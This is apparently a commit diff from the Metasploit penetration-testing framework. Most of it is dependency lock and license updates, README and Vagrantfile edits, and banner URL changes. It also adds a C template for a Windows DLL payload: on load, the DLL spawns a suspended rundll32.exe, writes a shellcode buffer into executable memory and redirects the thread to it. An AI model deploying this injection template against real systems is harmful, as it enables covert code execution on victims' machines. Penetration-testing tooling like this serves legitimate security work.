||||||
addressable (>= 2.3.5, < 2.6)
|
addressable (>= 2.3.5, < 2.6)
|
||||||
faraday (~> 0.8, < 1.0)
|
faraday (~> 0.8, < 1.0)
|
||||||
shoulda-matchers (3.1.1)
|
simplecov (0.15.1)
|
||||||
activesupport (>= 4.0.0)
|
|
||||||
signet (0.7.3)
|
|
||||||
addressable (~> 2.3)
|
|
||||||
faraday (~> 0.9)
|
|
||||||
jwt (~> 1.5)
|
|
||||||
multi_json (~> 1.10)
|
|
||||||
simplecov (0.14.1)
|
|
||||||
docile (~> 1.1.0)
|
docile (~> 1.1.0)
|
||||||
json (>= 1.8, < 3)
|
json (>= 1.8, < 3)
|
||||||
simplecov-html (~> 0.10.0)
|
simplecov-html (~> 0.10.0)
|
||||||
simplecov-html (0.10.1)
|
simplecov-html (0.10.2)
|
||||||
slop (3.6.0)
|
|
||||||
sqlite3 (1.3.13)
|
sqlite3 (1.3.13)
|
||||||
sshkey (1.9.0)
|
sshkey (1.9.0)
|
||||||
thor (0.19.4)
|
thor (0.20.0)
|
||||||
thread_safe (0.3.6)
|
thread_safe (0.3.6)
|
||||||
timecop (0.8.1)
|
timecop (0.9.1)
|
||||||
|
ttfunk (1.5.1)
|
||||||
tzinfo (1.2.3)
|
tzinfo (1.2.3)
|
||||||
thread_safe (~> 0.1)
|
thread_safe (~> 0.1)
|
||||||
tzinfo-data (1.2017.2)
|
tzinfo-data (1.2017.2)
|
||||||
tzinfo (>= 1.0.0)
|
tzinfo (>= 1.0.0)
|
||||||
windows_error (0.1.2)
|
windows_error (0.1.2)
|
||||||
|
xdr (2.0.0)
|
||||||
|
activemodel (>= 4.2.7)
|
||||||
|
activesupport (>= 4.2.7)
|
||||||
xmlrpc (0.3.0)
|
xmlrpc (0.3.0)
|
||||||
xpath (2.1.0)
|
|
||||||
nokogiri (~> 1.3)
|
|
||||||
yard (0.9.9)
|
yard (0.9.9)
|
||||||
|
|
||||||
PLATFORMS
|
PLATFORMS
|
||||||
ruby
|
ruby
|
||||||
|
|
||||||
DEPENDENCIES
|
DEPENDENCIES
|
||||||
aruba
|
|
||||||
cucumber-rails
|
|
||||||
factory_girl_rails
|
factory_girl_rails
|
||||||
fivemat
|
fivemat
|
||||||
metasploit-aggregator
|
|
||||||
metasploit-framework!
|
metasploit-framework!
|
||||||
octokit
|
octokit
|
||||||
pry
|
pry
|
||||||
rake
|
rake
|
||||||
redcarpet
|
redcarpet
|
||||||
rspec-rails
|
rspec-rails
|
||||||
shoulda-matchers
|
rspec-rerun
|
||||||
simplecov
|
simplecov
|
||||||
timecop
|
timecop
|
||||||
yard
|
yard
|
||||||
|
|
||||||
BUNDLED WITH
|
BUNDLED WITH
|
||||||
1.15.1
|
1.15.4
|
||||||
|
|
38
HACKING
38
HACKING
|
@ -1,38 +0,0 @@
|
||||||
HACKING
|
|
||||||
=======
|
|
||||||
|
|
||||||
(Last updated: 2014-03-04)
|
|
||||||
|
|
||||||
This document almost entirely deprecated by:
|
|
||||||
|
|
||||||
CONTRIBUTING.md
|
|
||||||
|
|
||||||
in the same directory as this file, and to a lesser extent:
|
|
||||||
|
|
||||||
The Metasploit Development Environment
|
|
||||||
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
|
|
||||||
|
|
||||||
Common Coding Mistakes
|
|
||||||
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
|
|
||||||
|
|
||||||
The Ruby Style Guide
|
|
||||||
https://github.com/bbatsov/ruby-style-guide
|
|
||||||
|
|
||||||
Ruby 1.9: What to Expect
|
|
||||||
http://slideshow.rubyforge.org/ruby19.html
|
|
||||||
|
|
||||||
You can use the the "./tools/msftidy.rb" script against your new and
|
|
||||||
changed modules to do some rudimentary checking for various style and
|
|
||||||
syntax violations.
|
|
||||||
|
|
||||||
Licensing for Your New Content
|
|
||||||
==============================
|
|
||||||
|
|
||||||
By submitting code contributions to the Metasploit Project it is
|
|
||||||
assumed that you are offering your code under the Metasploit License
|
|
||||||
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
|
|
||||||
are also fine. We specifically cannot include GPL code. LGPL code
|
|
||||||
is accepted on a case by case basis for libraries only and is never
|
|
||||||
accepted for modules.
|
|
||||||
|
|
||||||
|
|
79
LICENSE_GEMS
79
LICENSE_GEMS
|
@ -1,71 +1,62 @@
|
||||||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||||
actionpack, 4.2.8, MIT
|
Ascii85, 1.0.2, MIT
|
||||||
actionview, 4.2.8, MIT
|
actionpack, 4.2.9, MIT
|
||||||
activemodel, 4.2.8, MIT
|
actionview, 4.2.9, MIT
|
||||||
activerecord, 4.2.8, MIT
|
activemodel, 4.2.9, MIT
|
||||||
activesupport, 4.2.8, MIT
|
activerecord, 4.2.9, MIT
|
||||||
|
activesupport, 4.2.9, MIT
|
||||||
addressable, 2.5.1, "Apache 2.0"
|
addressable, 2.5.1, "Apache 2.0"
|
||||||
|
afm, 0.2.2, MIT
|
||||||
arel, 6.0.4, MIT
|
arel, 6.0.4, MIT
|
||||||
arel-helpers, 2.4.0, unknown
|
arel-helpers, 2.4.0, unknown
|
||||||
aruba, 0.14.2, MIT
|
|
||||||
backports, 3.8.0, MIT
|
backports, 3.8.0, MIT
|
||||||
bcrypt, 3.1.11, MIT
|
bcrypt, 3.1.11, MIT
|
||||||
bindata, 2.4.0, ruby
|
bindata, 2.4.0, ruby
|
||||||
bit-struct, 0.16, ruby
|
bit-struct, 0.16, ruby
|
||||||
builder, 3.2.3, MIT
|
builder, 3.2.3, MIT
|
||||||
bundler, 1.15.0, MIT
|
bundler, 1.15.1, MIT
|
||||||
capybara, 2.14.0, MIT
|
|
||||||
childprocess, 0.5.9, MIT
|
|
||||||
coderay, 1.1.1, MIT
|
coderay, 1.1.1, MIT
|
||||||
contracts, 0.16.0, "Simplified BSD"
|
|
||||||
cucumber, 2.4.0, MIT
|
|
||||||
cucumber-core, 1.5.0, MIT
|
|
||||||
cucumber-rails, 1.5.0, MIT
|
|
||||||
cucumber-wire, 0.0.1, MIT
|
|
||||||
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
||||||
|
dnsruby, 1.60.1, "Apache 2.0"
|
||||||
docile, 1.1.5, MIT
|
docile, 1.1.5, MIT
|
||||||
erubis, 2.7.0, MIT
|
erubis, 2.7.0, MIT
|
||||||
factory_girl, 4.8.0, MIT
|
factory_girl, 4.8.0, MIT
|
||||||
factory_girl_rails, 4.8.0, MIT
|
factory_girl_rails, 4.8.0, MIT
|
||||||
faraday, 0.12.1, MIT
|
faraday, 0.12.1, MIT
|
||||||
ffi, 1.9.18, "New BSD"
|
|
||||||
filesize, 0.1.1, MIT
|
filesize, 0.1.1, MIT
|
||||||
fivemat, 1.3.3, MIT
|
fivemat, 1.3.5, MIT
|
||||||
gherkin, 4.1.3, MIT
|
|
||||||
google-protobuf, 3.3.0, "New BSD"
|
google-protobuf, 3.3.0, "New BSD"
|
||||||
googleauth, 0.5.1, "Apache 2.0"
|
googleauth, 0.5.1, "Apache 2.0"
|
||||||
grpc, 1.3.4, "New BSD"
|
grpc, 1.4.1, "New BSD"
|
||||||
i18n, 0.8.1, MIT
|
hashery, 2.1.2, "Simplified BSD"
|
||||||
|
i18n, 0.8.6, MIT
|
||||||
jsobfu, 0.4.2, "New BSD"
|
jsobfu, 0.4.2, "New BSD"
|
||||||
json, 2.1.0, ruby
|
json, 2.1.0, ruby
|
||||||
jwt, 1.5.6, MIT
|
jwt, 1.5.6, MIT
|
||||||
little-plugger, 1.1.4, MIT
|
little-plugger, 1.1.4, MIT
|
||||||
logging, 2.2.2, MIT
|
logging, 2.2.2, MIT
|
||||||
loofah, 2.0.3, MIT
|
loofah, 2.0.3, MIT
|
||||||
memoist, 0.15.0, MIT
|
memoist, 0.16.0, MIT
|
||||||
metasm, 1.0.3, LGPL
|
metasm, 1.0.3, LGPL
|
||||||
metasploit-aggregator, 0.2.1, "New BSD"
|
metasploit-aggregator, 0.2.1, "New BSD"
|
||||||
metasploit-concern, 2.0.4, "New BSD"
|
metasploit-concern, 2.0.5, "New BSD"
|
||||||
metasploit-credential, 2.0.9, "New BSD"
|
metasploit-credential, 2.0.10, "New BSD"
|
||||||
metasploit-framework, 4.14.23, "New BSD"
|
metasploit-framework, 4.15.0, "New BSD"
|
||||||
metasploit-model, 2.0.4, "New BSD"
|
metasploit-model, 2.0.4, "New BSD"
|
||||||
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
|
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
|
||||||
metasploit_data_models, 2.0.14, "New BSD"
|
metasploit_data_models, 2.0.15, "New BSD"
|
||||||
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
|
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
|
||||||
method_source, 0.8.2, MIT
|
method_source, 0.8.2, MIT
|
||||||
mime-types, 3.1, MIT
|
mini_portile2, 2.2.0, MIT
|
||||||
mime-types-data, 3.2016.0521, MIT
|
|
||||||
mini_portile2, 2.1.0, MIT
|
|
||||||
minitest, 5.10.2, MIT
|
minitest, 5.10.2, MIT
|
||||||
msgpack, 1.1.0, "Apache 2.0"
|
msgpack, 1.1.0, "Apache 2.0"
|
||||||
multi_json, 1.12.1, MIT
|
multi_json, 1.12.1, MIT
|
||||||
multi_test, 0.1.2, MIT
|
|
||||||
multipart-post, 2.0.0, MIT
|
multipart-post, 2.0.0, MIT
|
||||||
nessus_rest, 0.1.6, MIT
|
nessus_rest, 0.1.6, MIT
|
||||||
net-ssh, 4.1.0, MIT
|
net-ssh, 4.1.0, MIT
|
||||||
network_interface, 0.0.1, MIT
|
network_interface, 0.0.1, MIT
|
||||||
nexpose, 6.0.0, BSD
|
nexpose, 6.1.0, BSD
|
||||||
nokogiri, 1.7.2, MIT
|
nokogiri, 1.8.0, MIT
|
||||||
octokit, 4.7.0, MIT
|
octokit, 4.7.0, MIT
|
||||||
openssl-ccm, 1.2.1, MIT
|
openssl-ccm, 1.2.1, MIT
|
||||||
openvas-omp, 0.0.4, MIT
|
openvas-omp, 0.0.4, MIT
|
||||||
|
@ -73,6 +64,7 @@ os, 0.9.6, MIT
|
||||||
packetfu, 1.1.13, BSD
|
packetfu, 1.1.13, BSD
|
||||||
patch_finder, 1.0.2, "New BSD"
|
patch_finder, 1.0.2, "New BSD"
|
||||||
pcaprub, 0.12.4, LGPL-2.1
|
pcaprub, 0.12.4, LGPL-2.1
|
||||||
|
pdf-reader, 2.0.0, MIT
|
||||||
pg, 0.20.0, "New BSD"
|
pg, 0.20.0, "New BSD"
|
||||||
pg_array_parser, 0.0.9, unknown
|
pg_array_parser, 0.0.9, unknown
|
||||||
postgres_ext, 3.0.0, MIT
|
postgres_ext, 3.0.0, MIT
|
||||||
|
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
|
||||||
rails-deprecated_sanitizer, 1.0.3, MIT
|
rails-deprecated_sanitizer, 1.0.3, MIT
|
||||||
rails-dom-testing, 1.0.8, MIT
|
rails-dom-testing, 1.0.8, MIT
|
||||||
rails-html-sanitizer, 1.0.3, MIT
|
rails-html-sanitizer, 1.0.3, MIT
|
||||||
railties, 4.2.8, MIT
|
railties, 4.2.9, MIT
|
||||||
rake, 12.0.0, MIT
|
rake, 12.0.0, MIT
|
||||||
rb-readline, 0.5.4, BSD
|
rb-readline, 0.5.4, BSD
|
||||||
recog, 2.1.8, unknown
|
recog, 2.1.11, unknown
|
||||||
redcarpet, 3.4.0, MIT
|
redcarpet, 3.4.0, MIT
|
||||||
rex-arch, 0.1.4, "New BSD"
|
rex-arch, 0.1.9, "New BSD"
|
||||||
rex-bin_tools, 0.1.3, "New BSD"
|
rex-bin_tools, 0.1.4, "New BSD"
|
||||||
rex-core, 0.1.10, "New BSD"
|
rex-core, 0.1.11, "New BSD"
|
||||||
rex-encoder, 0.1.4, "New BSD"
|
rex-encoder, 0.1.4, "New BSD"
|
||||||
rex-exploitation, 0.1.14, "New BSD"
|
rex-exploitation, 0.1.14, "New BSD"
|
||||||
rex-java, 0.1.5, "New BSD"
|
rex-java, 0.1.5, "New BSD"
|
||||||
|
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
|
||||||
rex-random_identifier, 0.1.2, "New BSD"
|
rex-random_identifier, 0.1.2, "New BSD"
|
||||||
rex-registry, 0.1.3, "New BSD"
|
rex-registry, 0.1.3, "New BSD"
|
||||||
rex-rop_builder, 0.1.3, "New BSD"
|
rex-rop_builder, 0.1.3, "New BSD"
|
||||||
rex-socket, 0.1.6, "New BSD"
|
rex-socket, 0.1.8, "New BSD"
|
||||||
rex-sslscan, 0.1.4, "New BSD"
|
rex-sslscan, 0.1.4, "New BSD"
|
||||||
rex-struct2, 0.1.2, "New BSD"
|
rex-struct2, 0.1.2, "New BSD"
|
||||||
rex-text, 0.2.15, "New BSD"
|
rex-text, 0.2.15, "New BSD"
|
||||||
rex-zip, 0.1.3, "New BSD"
|
rex-zip, 0.1.3, "New BSD"
|
||||||
rkelly-remix, 0.0.7, MIT
|
rkelly-remix, 0.0.7, MIT
|
||||||
robots, 0.10.1, MIT
|
robots, 0.10.1, MIT
|
||||||
|
rspec, 3.6.0, MIT
|
||||||
rspec-core, 3.6.0, MIT
|
rspec-core, 3.6.0, MIT
|
||||||
rspec-expectations, 3.6.0, MIT
|
rspec-expectations, 3.6.0, MIT
|
||||||
rspec-mocks, 3.6.0, MIT
|
rspec-mocks, 3.6.0, MIT
|
||||||
rspec-rails, 3.6.0, MIT
|
rspec-rails, 3.6.0, MIT
|
||||||
|
rspec-rerun, 1.1.0, MIT
|
||||||
rspec-support, 3.6.0, MIT
|
rspec-support, 3.6.0, MIT
|
||||||
ruby_smb, 0.0.17, "New BSD"
|
ruby-rc4, 0.1.5, MIT
|
||||||
|
ruby_smb, 0.0.18, "New BSD"
|
||||||
rubyntlm, 0.6.2, MIT
|
rubyntlm, 0.6.2, MIT
|
||||||
rubyzip, 1.2.1, "Simplified BSD"
|
rubyzip, 1.2.1, "Simplified BSD"
|
||||||
sawyer, 0.8.1, MIT
|
sawyer, 0.8.1, MIT
|
||||||
shoulda-matchers, 3.1.1, MIT
|
|
||||||
signet, 0.7.3, "Apache 2.0"
|
signet, 0.7.3, "Apache 2.0"
|
||||||
simplecov, 0.14.1, MIT
|
simplecov, 0.14.1, MIT
|
||||||
simplecov-html, 0.10.1, MIT
|
simplecov-html, 0.10.1, MIT
|
||||||
|
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
|
||||||
sshkey, 1.9.0, MIT
|
sshkey, 1.9.0, MIT
|
||||||
thor, 0.19.4, MIT
|
thor, 0.19.4, MIT
|
||||||
thread_safe, 0.3.6, "Apache 2.0"
|
thread_safe, 0.3.6, "Apache 2.0"
|
||||||
timecop, 0.8.1, MIT
|
timecop, 0.9.1, MIT
|
||||||
|
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||||
tzinfo, 1.2.3, MIT
|
tzinfo, 1.2.3, MIT
|
||||||
tzinfo-data, 1.2017.2, MIT
|
tzinfo-data, 1.2017.2, MIT
|
||||||
windows_error, 0.1.2, BSD
|
windows_error, 0.1.2, BSD
|
||||||
|
xdr, 2.0.0, "Apache 2.0"
|
||||||
xmlrpc, 0.3.0, ruby
|
xmlrpc, 0.3.0, ruby
|
||||||
xpath, 2.1.0, MIT
|
|
||||||
yard, 0.9.9, MIT
|
yard, 0.9.9, MIT
|
||||||
|
|
|
@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
|
||||||
API documentation for writing modules can be found at:
|
API documentation for writing modules can be found at:
|
||||||
https://rapid7.github.io/metasploit-framework/api
|
https://rapid7.github.io/metasploit-framework/api
|
||||||
|
|
||||||
Questions and suggestions can be sent to:
|
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
|
||||||
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
|
|
||||||
|
|
||||||
Installing
|
Installing
|
||||||
--
|
--
|
||||||
|
|
||||||
Generally, you should use [the free installer](https://www.metasploit.com/download),
|
Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
|
||||||
which contains all of the dependencies and will get you up and running with a
|
which contains all of the dependencies and will get you up and running with a
|
||||||
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
|
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
|
||||||
you'd like to deal with dependencies on your own.
|
you'd like to deal with dependencies on your own.
|
||||||
|
|
1
Rakefile
1
Rakefile
|
@ -11,6 +11,7 @@ Metasploit::Framework::Require.optionally_active_record_railtie
|
||||||
|
|
||||||
begin
|
begin
|
||||||
require 'rspec/core'
|
require 'rspec/core'
|
||||||
|
require 'rspec-rerun/tasks'
|
||||||
rescue LoadError
|
rescue LoadError
|
||||||
puts "rspec not in bundle, so can't set up spec tasks. " \
|
puts "rspec not in bundle, so can't set up spec tasks. " \
|
||||||
"To run specs ensure to install the development and test groups."
|
"To run specs ensure to install the development and test groups."
|
||||||
|
|
|
@ -3,10 +3,7 @@
|
||||||
|
|
||||||
Vagrant.configure(2) do |config|
|
Vagrant.configure(2) do |config|
|
||||||
config.ssh.forward_x11 = true
|
config.ssh.forward_x11 = true
|
||||||
config.vm.box = "ubuntu/trusty64"
|
config.vm.box = "ubuntu/xenial64"
|
||||||
# TODO: find a minimal image that keeps up-to-date and
|
|
||||||
# supports multiple providers
|
|
||||||
#config.vm.box = "phusion/ubuntu-14.04-amd64"
|
|
||||||
config.vm.network :forwarded_port, guest: 4444, host: 4444
|
config.vm.network :forwarded_port, guest: 4444, host: 4444
|
||||||
config.vm.provider "vmware" do |v|
|
config.vm.provider "vmware" do |v|
|
||||||
v.memory = 2048
|
v.memory = 2048
|
||||||
|
@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
|
||||||
[ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
|
[ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
|
||||||
"apt-get update",
|
"apt-get update",
|
||||||
"apt-get dist-upgrade -y",
|
"apt-get dist-upgrade -y",
|
||||||
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
|
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
|
||||||
].each do |step|
|
].each do |step|
|
||||||
config.vm.provision "shell", inline: step
|
config.vm.provision "shell", inline: step
|
||||||
end
|
end
|
||||||
|
|
||||||
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
|
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
|
||||||
"curl -L https://get.rvm.io | bash -s stable",
|
"curl -L https://get.rvm.io | bash -s stable",
|
||||||
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
|
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
|
||||||
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
|
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
|
||||||
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
|
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
|
||||||
"mkdir -p ~/.msf4",
|
"mkdir -p ~/.msf4",
|
||||||
|
|
|
@ -0,0 +1,16 @@
|
||||||
|
#!/bin/sh
|
||||||
|
rm -f *.o *.dll
|
||||||
|
|
||||||
|
CCx86="i686-w64-mingw32"
|
||||||
|
CCx64="x86_64-w64-mingw32"
|
||||||
|
|
||||||
|
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
|
||||||
|
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
|
||||||
|
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
|
||||||
|
rm -f temp.dll *.o
|
||||||
|
|
||||||
|
${CCx86}-gcc -c -Os template.c -Wall -shared
|
||||||
|
${CCx86}-dllwrap --def template.def *.o -o temp.dll
|
||||||
|
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
|
||||||
|
rm -f temp.dll *.o
|
||||||
|
|
|
@ -0,0 +1,95 @@
|
||||||
|
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
|
||||||
|
// - removed ExitThread(0) to prevent an Explorer crash
|
||||||
|
// - added Mutex to prevent invoking payload multiple times (at least try)
|
||||||
|
#include <windows.h>
|
||||||
|
#include "template.h"
|
||||||
|
|
||||||
|
void inline_bzero(void *p, size_t l)
|
||||||
|
{
|
||||||
|
BYTE *q = (BYTE *)p;
|
||||||
|
size_t x = 0;
|
||||||
|
for (x = 0; x < l; x++)
|
||||||
|
*(q++) = 0x00;
|
||||||
|
}
|
||||||
|
|
||||||
|
void ExecutePayload(void);
|
||||||
|
|
||||||
|
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
|
||||||
|
{
|
||||||
|
switch (dwReason)
|
||||||
|
{
|
||||||
|
case DLL_PROCESS_ATTACH:
|
||||||
|
ExecutePayload();
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_PROCESS_DETACH:
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_THREAD_ATTACH:
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
void ExecutePayload(void)
|
||||||
|
{
|
||||||
|
PROCESS_INFORMATION pi;
|
||||||
|
STARTUPINFO si;
|
||||||
|
CONTEXT ctx;
|
||||||
|
LPVOID ep;
|
||||||
|
HANDLE hMutex;
|
||||||
|
SECURITY_ATTRIBUTES MutexAttributes;
|
||||||
|
|
||||||
|
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
|
||||||
|
MutexAttributes.nLength = sizeof(MutexAttributes);
|
||||||
|
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
|
||||||
|
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
|
||||||
|
if(hMutex == NULL)
|
||||||
|
{
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(GetLastError() == ERROR_ALREADY_EXISTS)
|
||||||
|
{
|
||||||
|
CloseHandle(hMutex);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(GetLastError() == ERROR_ACCESS_DENIED)
|
||||||
|
{
|
||||||
|
CloseHandle(hMutex);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Start up the payload in a new process
|
||||||
|
inline_bzero(&si, sizeof(si));
|
||||||
|
si.cb = sizeof(si);
|
||||||
|
|
||||||
|
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
|
||||||
|
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
|
||||||
|
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
|
||||||
|
GetThreadContext(pi.hThread, &ctx);
|
||||||
|
|
||||||
|
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
|
||||||
|
|
||||||
|
#ifdef _WIN64
|
||||||
|
ctx.Rip = (DWORD64)ep;
|
||||||
|
#else
|
||||||
|
ctx.Eip = (DWORD)ep;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
SetThreadContext(pi.hThread, &ctx);
|
||||||
|
ResumeThread(pi.hThread);
|
||||||
|
|
||||||
|
CloseHandle(pi.hThread);
|
||||||
|
CloseHandle(pi.hProcess);
|
||||||
|
}
|
||||||
|
|
||||||
|
CloseHandle(hMutex);
|
||||||
|
}
|
||||||
|
|
|
@ -0,0 +1,3 @@
|
||||||
|
EXPORTS
|
||||||
|
DllMain@12
|
||||||
|
|
|
@ -0,0 +1,3 @@
|
||||||
|
#define SCSIZE 2048
|
||||||
|
unsigned char code[SCSIZE] = "PAYLOAD:";
|
||||||
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
|
||||||
|
LANGUAGE 9, 1
|
||||||
|
|
||||||
|
|
||||||
|
VS_VERSION_INFO VERSIONINFO
|
||||||
|
FILEVERSION 0,0,0,1
|
||||||
|
PRODUCTVERSION 0,0,0,1
|
||||||
|
FILEFLAGSMASK 0x17L
|
||||||
|
FILEFLAGS 0x0L
|
||||||
|
FILEOS 0x4L
|
||||||
|
FILETYPE 0x2L
|
||||||
|
FILESUBTYPE 0x0L
|
||||||
|
BEGIN
|
||||||
|
|
||||||
|
END
|
||||||
|
|
||||||
|
#define RT_HTML 23
|
||||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
|
||||||
return "NTLMv1"
|
return "NTLMv1"
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
raise RuntimeError, "Unknow hash type"
|
raise RuntimeError, "Unknown hash type"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -15,5 +15,5 @@
|
||||||
| %bld[ OK ]%clr |
|
| %bld[ OK ]%clr |
|
||||||
|______________________________________________________________________________|
|
|______________________________________________________________________________|
|
||||||
| |
|
| |
|
||||||
| http://metasploit.com |
|
| https://metasploit.com |
|
||||||
|______________________________________________________________________________|%clr
|
|______________________________________________________________________________|%clr
|
||||||
|
|
|
@ -18,4 +18,4 @@
|
||||||
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
||||||
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
||||||
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
||||||
%clr%bld http://metasploit.com
|
%clr%bld https://metasploit.com
|
||||||
|
|
|
@ -27,4 +27,4 @@
|
||||||
################################################################################
|
################################################################################
|
||||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||||
################################################################################
|
################################################################################
|
||||||
http://metasploit.com%clr
|
https://metasploit.com%clr
|
||||||
|
|
|
@ -27,4 +27,4 @@
|
||||||
# # ### # # ##
|
# # ### # # ##
|
||||||
########################
|
########################
|
||||||
## ## ## ##
|
## ## ## ##
|
||||||
http://metasploit.com%clr
|
https://metasploit.com%clr
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
|
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
|
|
@ -23,4 +23,4 @@
|
||||||
; ,''-,;' ``-
|
; ,''-,;' ``-
|
||||||
``-..__``--`
|
``-..__``--`
|
